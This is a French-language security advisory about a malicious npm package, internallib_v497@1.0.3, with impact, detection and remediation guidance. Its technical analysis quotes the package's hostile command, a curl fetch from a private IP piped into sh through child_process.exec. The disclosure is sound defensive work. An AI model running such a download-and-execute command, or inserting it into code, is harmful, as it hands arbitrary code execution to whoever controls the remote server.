GHSA-m9ww-2r6q-x632 : internallib_v497 exécute un script distant via curl | sh
Veille sécuritéSupply chain & dépendances
P3Élevée

Le paquet npm internallib_v497@1.0.3 contient une fonction qui télécharge un script HTTP depuis une adresse privée et l’exécute via un shell.

npmNode.jsLinux
IdentifiantGHSA-M9WW-2R6Q-X632
EPSS
Exploitationnon connue / non déterminée
CorrectifÀ vérifier

Analyse technique

Lors de l’appel de la fonction exportée command(), le code lance curl http://10.0.5.109/shell.sh | sh au moyen de child_process.exec. Le contenu du script exécuté est entièrement contrôlé par le serveur le fournissant.

Impact, versions et correctif

VecteurAppel applicatif à la fonction command() après installation et import du paquet.
PréconditionsInstaller internallib_v497@1.0.3 et invoquer sa fonction exportée sur un hôte pouvant joindre l’adresse cible.
ImpactExécution de code arbitraire sous l’identité du processus Node.js.
Versions affectées= 1.0.3
ContournementSupprimer la dépendance et éviter tout appel à son API.
Exploitation activenon connue / non déterminée
PoC publicinconnu
Publication2026-09-23T03:30:40Z
Mise à jour2026-09-23T03:30:41Z

Détection / vérification

Rechercher internallib_v497 dans les manifestes et lockfiles npm, ainsi que des processus curl, sh ou Node.js associés à l’URL 10.0.5.109/shell.sh.

Action recommandée

Bloquer le paquet dans les registres internes, retirer la version 1.0.3 et analyser les hôtes où la fonction a pu être invoquée.

Sources

Priorisation DFS : P3 · confiance de recoupement standard · 1 source(s).